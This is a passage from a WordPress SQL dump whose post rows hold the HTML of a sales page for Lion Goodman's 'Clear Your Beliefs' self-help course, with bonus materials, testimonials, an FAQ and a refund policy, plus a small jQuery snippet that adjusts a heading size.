height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:48:22', '2014-06-18 02:48:22', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1007, 4194, '2014-06-17 21:52:11', '2014-06-18 02:52:11', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something 